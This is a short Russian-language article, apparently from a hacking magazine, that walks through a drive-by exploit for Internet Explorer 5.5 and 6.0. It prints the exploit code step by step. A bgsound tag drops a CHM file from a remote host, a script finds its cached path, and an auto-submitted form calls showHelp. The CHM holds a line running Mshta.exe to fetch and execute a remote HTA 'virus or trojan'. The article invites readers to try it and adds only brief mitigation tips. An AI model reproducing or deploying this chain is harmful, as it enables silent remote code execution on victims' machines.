Броузеры Internet Explorer 5.5 и 6.0 содержат
уязвимость, которая позволяет выполнять
произвольные файлы на удаленном компьютере.

Основной принцип таков — записать в Temporary
Internet Files нужный нам код и затем выполнить
его через функцию showHelp.

По шагам весь процесс выглядит так.
Создаем простой HTML файл, который будет
записывать файл помощи chm на компьютер
жертвы:

<bgsound src="http://www.example.com/malware.chm">

Затем используем скрипт, созданный
знаменитым Гунинским для определения
полного пути к нему:

malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf("\\"));
path=unescape(path);

Что дальше? Так как напрямую вызвать файл
не удастся, надо сделать форму, автоматом
"подписав" ее мы тем самым заставим
пользователя выполнить нужный нам файл
помощи. Вот так:

document.write(‘<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">’);
document.write(‘<form><input type="hidden" size="40"
maxlength="80"
value="’+path+’\\malware[1].chm"></form>’);

Исполняем форму:

setTimeout(‘document.malware.submit()’,5000);

Все. Настала пора разобраться, что же мы
хотим от жертвы, что содержится в malware.chm? А
там все просто — единственная строчка:

C:\WINDOWS\SYSTEM\Mshta.exe http://www.malware.com/foobar.hta

Foobar.hta и есть наш гипотетический вирус или
троян (вы можете выполнить такую команду на
своем компьютере, рабочий файл на сервере
существует — посмотрите что получится),
причем он запустится без всякого
предупреждения! Аналогично можно
забубенить бедному юзеру и любой .exe файл и
выполнить его на компьютере пользователя.

Как спастись:

  1. Не открывать HTML файлы в мейлах
  2. Выключить Active Scripting и Active X
  3. Стереть Mshta.exe (хотя в случае с экзешником
    это конечно не спасет)

Оставить мнение

Check Also

Что можно сделать с iPhone, зная пасскод. Как сливают данные, уводят iCloud и блокируют остальные устройства

Последние несколько месяцев мы много писали о нововведениях в iOS 11. «Теперь-то заживем!»…